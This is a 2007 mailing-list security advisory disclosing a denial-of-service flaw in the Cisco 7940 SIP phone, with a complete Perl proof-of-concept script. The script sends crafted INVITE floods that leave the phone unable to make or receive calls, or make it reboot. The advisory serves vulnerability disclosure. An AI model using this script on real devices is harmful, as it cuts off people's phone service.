[VOIPSEC] Cisco Phone 7940 remote DOS

Radu State State at loria.fr
Wed Dec 5 14:15:59 GMT 2007


Cisco 7940 Denial of Service Vulnerability

 

Hardware:

Cisco 7940 SIP Phone

 

 

Severity:

High – Denial of Service

 

Software:

Affected version: P0S3-08-7-00

Other Versions: May be

 

Notification:

Vulnerability found: 30 August 2007

Contact Cisco: 31 August 2007

Tracked issue: 11 September 2007

 

Vulnerability Synopsis:

 

Initiating a sequence of SIP INVITE transactions leads the device to a state
where it looks functional but it is not able to receive nor to start calls.
If the sequence of INVITE continues, the device will reboot. In the first
case, the period of time where the device is exposed to a DoS is about 3
minutes, but sending new INVITE transactions, at certain intervals, will
keep the target under DoS.

 

In order to generate the SIP INVITE transactions that lead the device to
such state, the Request-URI of the message should not have a user name (i.e.
"INVITE sip:XXX.XXX.XXX.XXX SIP/2.0"). In order to drive the device to a DoS
state only 6 transactions are required as the traffic displayed below.

 

X ----------------------- INVITE (Call-ID #1) -----------------------> Cisco
7940

X <------------------ 100 Trying (Call-ID #1) --------------------- Cisco
7940

 ....

--------5 New Dialogs like the previous--------

 ....

X ----------------------- INVITE (Call-ID #7) -----------------------> Cisco
7940

X <------------------ 486 Busy (Call-ID #7) --------------------- Cisco 7940

 

-------- DoS for aproximatly 3 minutes ------

 

X <------------------ 486 Busy (Call-ID #1) --------------------- Cisco 7940


X <------------------ 486 Busy (Call-ID #2) --------------------- Cisco 7940


X <------------------ 486 Busy (Call-ID #3) --------------------- Cisco 7940

X <------------------ 486 Busy (Call-ID #4) --------------------- Cisco 7940

X <------------------ 486 Busy (Call-ID #5) --------------------- Cisco 7940


X <------------------ 486 Busy (Call-ID #6) --------------------- Cisco 7940

 

Effect:

If the sequence of INVITE transactions continues, the device reboots.

Otherwise, the device can be permanently put under DoS by sending INVITE
transactions at certain intervals.

In such case the device replies busy to any incoming call and return busy to
any call made by the user.

However, the device maintains its connectivity with its registrar by sending
the REGISTER transaction.

 

Impact:

Knowing the userid and IP address of the target:

A remote user can crash the phone

DoS can performed by sending the packets at regular intervals

 

Proof of Concept:

A perl script stateful-cisco-8.7.pl) is attached to this mail.

 

Command:

perl stateful-cisco-8.7.pl <username> <dst_IP> <SourceIp> <sourceport> Eg.
perl stateful-cisco-8.7.pl 192.168.1.7 7940-1 192.168.1.2 tucu

 

Credits:

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)

 

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF the Madynes VoIP fuzzer.

HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr/

 

 

#!/usr/bin/perl

 

###############################

# Vulnerabily discovered using KiF ~ Kiph

#

# Authors:

# Humberto J. Abdelnur (Ph.D Student)

# Radu State (Ph.D)

# Olivier Festor (Ph.D)

#

# Madynes Team, LORIA - INRIA Lorraine

# HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr

###############################

 

use IO::Socket::INET;

use String::Random;

 

die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>" 

unless ($ARGV[3]);

 

$targetUser = $ARGV[1];

$targetIP = $ARGV[0];

 

$attackerUser = $ARGV[3];

$attackerIP= $ARGV[2];

 

$socket=new IO::Socket::INET->new(

Proto=>'udp',

PeerPort=>5060,

PeerAddr=>$targetIP,

LocalPort=>5060);

 

$foo = new String::Random;

 

$flag = 0;

@calls;

$threads = 0;

 

while ($flag == 0){

$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP";

$cseq = $foo->randregex('\d\d\d\d');

 

$msg = "INVITE sip:$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\@$attackerIP>;tag=1\r

To: <sip:$targetUser\@$targetIP>\r

Call-ID:$callid\r

CSeq: $cseq INVITE\r

Max-Forwards: 70\r

Contact: <sip:$attackerUser\@$attackerIP>\r

Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, 

MESSAGE\r

Content-Length: 0\r

\r

";

$socket->send($msg);

 

$socket->recv($text,1024,0);

if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){

push(@calls, $callid);

sleep(1);

}elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){

if ($thread == 0){

$thread = scalar(@calls);

}

while (scalar(@calls) ge $thread){

$toTag = $cseq= $callid= $text;

$toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/;

$callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/;

$cseq =~ s/^(.*\r\n)*CSeq: (.*?) (.*?)\r\n(.*\r\n)*/\2/;

 

$msg = "ACK sip:$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\@$attackerIP>;tag=1\r

To: <sip:$targetUser\@$targetIP>$toTag\r

Call-ID:$callid\r

CSeq: $cseq ACK\r

Contact: <sip:$attackerUser\@$attackerIP>\r

Content-Length: 0\r

\r

";

$socket->send($msg);

$i= 0;

while ($i < scalar(@calls)){

if (@calls[$i] eq $callid){

delete @calls[$i];

}else{

$i += 1;

}

}

if (scalar(@calls) ge $thread){

$socket->recv($text,1024,0);

}

}

}

}

 

No virus found in this incoming message.

Checked by AVG Free Edition. 

Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007
19:31

 

 

 


No virus found in this outgoing message.
Checked by AVG Free Edition. 
Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007
19:31
 


More information about the Voipsec mailing list